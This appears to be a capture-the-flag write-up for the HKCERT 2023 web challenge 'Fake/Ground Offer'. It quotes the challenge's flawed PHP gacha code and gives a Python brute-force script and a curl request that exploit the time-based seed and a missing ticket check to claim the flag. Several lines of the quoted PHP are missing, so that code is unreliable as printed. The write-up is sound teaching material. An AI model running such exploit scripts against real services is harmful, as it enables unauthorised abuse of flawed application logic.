Fake/Ground Offer
Table of Contents
- 76 solves / 250 points
- Author: ozetta
- Overall difficulty for me (From 1-10 stars): ★★☆☆☆☆☆☆☆☆
Can you get 20 UR or SSR cards in the first 20 free gachas? …
Web: http://chal-a.hkcert23.pwnable.hk:28137 , http://chal-b.hkcert23.pwnable.hk:28137
Home page:
In here, we can draw something using the "Summon Ticket".
Let's click on the "Summon 1" button:
When we clicked that button, it'll send a GET request to /
with GET parameter gacha1
, and its value is Summon 1
After that we'll randomly got 1 UR/SSR/SR/R/N to our inventory.
How about "Summon 10"?
Almost the same as "Summon 1", but draw 10 times instead of once.
In the home page, we can also view the source:
include "secret.php";
$_SESSION["balance"] = 20;
$_SESSION["inventory"] = Array("UR" => 0, "SSR" => 0, "SR" => 0, "R" => 0, "N" => 0);
$gacha_result = "";
$seed = (time() - $pin) % 3600 + 1; //cannot use zero as seed
if($_SESSION["balance"] < 1){
$gacha_result = "Insufficient Summon Tickets!";
$_SESSION["balance"] -= 1;
$gacha_result = "You got ".implode(", ",gacha(1,$seed));
if($_SESSION["balance"] < 1){
$gacha_result = "Insufficient Summon Tickets!";
$_SESSION["balance"] -= 10;
$gacha_result = "You got ".implode(", ",gacha(10,$seed));
//Ultra Secure Seedable Random (USSR) gacha
function gacha($n,$s){
$out = [];
$x = sin($i*$s);
$r = $x-floor($x);
$out[] = lookup($r);
return $out;
function lookup($r){
if($r <= 0.001){
$_SESSION["inventory"]["UR"] += 1;
return "UR";
}elseif($r <= 0.004){
$_SESSION["inventory"]["SSR"] += 1;
return "SSR";
}elseif($r <= 0.009){
$_SESSION["inventory"]["SR"] += 1;
return "SR";
}elseif($r <= 0.016){
$_SESSION["inventory"]["R"] += 1;
return "R";
$_SESSION["inventory"]["N"] += 1;
return "N";
<title>Fake/Ground Offer</title>
<!-- This is the best frontend we can provide given the budget provided -->
<h1>Fake/Ground Offer</h1>
<p>Welcome, Master. Your ID is <?=session_id();?></p>
<p>Current Balance: <?=$_SESSION["balance"];?> Summon Ticket(s)</p>
<p>Current Inventory: <?php print_r($_SESSION["inventory"]);?></p>
<form><input type=submit name="gacha1" value="Summon 1"></form>
<form><input type=submit name="gacha10" value="Summon 10"></form>
<hr /><p><a href="?-s">Show Source</a></p>
Now we can dive deeper into the web application!
After reading the source a little bit, we can see something stands out.
First, when our inventory's UR + SSR >= 20, we can send a GET request to /
with GET parameter sellacc
to get the flag:
include "secret.php";
If we don't, it just returns string $flag
Then, we can see how the drawing works:
$gacha_result = "";
$seed = (time() - $pin) % 3600 + 1; //cannot use zero as seed
if($_SESSION["balance"] < 1){
$gacha_result = "Insufficient Summon Tickets!";
$_SESSION["balance"] -= 1;
$gacha_result = "You got ".implode(", ",gacha(1,$seed));
if($_SESSION["balance"] < 1){
$gacha_result = "Insufficient Summon Tickets!";
$_SESSION["balance"] -= 10;
$gacha_result = "You got ".implode(", ",gacha(10,$seed));
When we send a GET request to /
with GET parameter gacha1
or gacha10
, it'll call function gacha()
//Ultra Secure Seedable Random (USSR) gacha
function gacha($n,$s){
$out = [];
$x = sin($i*$s);
$r = $x-floor($x);
$out[] = lookup($r);
return $out;
function lookup($r){
if($r <= 0.001){
$_SESSION["inventory"]["UR"] += 1;
return "UR";
}elseif($r <= 0.004){
$_SESSION["inventory"]["SSR"] += 1;
return "SSR";
}elseif($r <= 0.009){
$_SESSION["inventory"]["SR"] += 1;
return "SR";
}elseif($r <= 0.016){
$_SESSION["inventory"]["R"] += 1;
return "R";
$_SESSION["inventory"]["N"] += 1;
return "N";
When function gacha()
is called, it'll calculate the probability based on the $seed
's value.
When I initially trying to solve this challenge, I immediately thought function gacha()
is vulnerable to race condition. However, there's no sub-state. When we try to draw 1/10 time(s), it'll always reduce our ticket first.
After fumbling around, I realized that the $seed
is time-sensitive:
$seed = (time() - $pin) % 3600 + 1; //cannot use zero as seed
Hmm… Maybe every second's drawing result will be the same??
I also found that we can actually draw 29 times instead of 20 times, as gacha10
doesn't check we have at least 10 tickets or not.
So we can draw 29 times via 9 gacha1
, and 2 gacha10
Hence, since the $seed
is time-sensitive, we can just brute force it to try to get UR + SSR >= 20.
To do so, I'll write a script using Python:
import asyncio
import aiohttp
from bs4 import BeautifulSoup
from time import sleep
import re
async def main():
while True:
# brute force it with 0.3 seconds delay,
# so we won't beat the server to death
async with aiohttp.ClientSession() as sess:
for _ in range(9):
resp = await sess.get(URL_GACHA1)
response_body = await resp.text()
for _ in range(2):
resp = await sess.get(URL_GACHA10)
response_body = await resp.text()
soup = BeautifulSoup(response_body, 'html.parser')
pTags = soup.find_all('p')
sessionId = pTags[0].text
inventory = pTags[2].text
sessionIdMatch = re.search(r'Your ID is ([a-fA-F0-9]+)', sessionId)
urMatch = re.search(r'\[UR\] => (\d+)', inventory)
ssrMatch = re.search(r'\[SSR\] => (\d+)', inventory)
idValue = sessionIdMatch.group(1)
urValue = int(urMatch.group(1))
ssrValue = int(ssrMatch.group(1))
urSSRValue = urValue + ssrValue
print(f'[*] Trying... Session ID: {idValue}, UR + SSR value: {urSSRValue}', end='\r')
if urSSRValue >= 20:
print('\n[+] We got UR + SSR >= 20!!')
print(f'[+] Session ID: {idValue}')
print(f'[+] UR value: {urValue}')
print(f'[+] SSR value: {ssrValue}')
if __name__ == '__main__':
URL_GACHA10 = 'http://chal-a.hkcert23.pwnable.hk:28137/?gacha10=blah'
URL_GACHA1 = 'http://chal-a.hkcert23.pwnable.hk:28137/?gacha1=blah'
After running it for sometimes, you might get lucky to get UR + SSR >= 20:
└> python3 solve.py
[*] Trying... Session ID: 5117fa47d437f27d8ff9094d5ebde132, UR + SSR value: 29
[+] We got UR + SSR >= 20!!
[+] Session ID: 5117fa47d437f27d8ff9094d5ebde132
[+] UR value: 15
[+] SSR value: 14
Finally, we can send a GET request to /
with GET parameter sellacc
and the PHP session ID to get the flag!
└> curl http://chal-a.hkcert23.pwnable.hk:28137/?sellacc= --cookie "PHPSESSID=5117fa47d437f27d8ff9094d5ebde132"
- Flag:
What we've learned:
- Exploiting flawed gacha system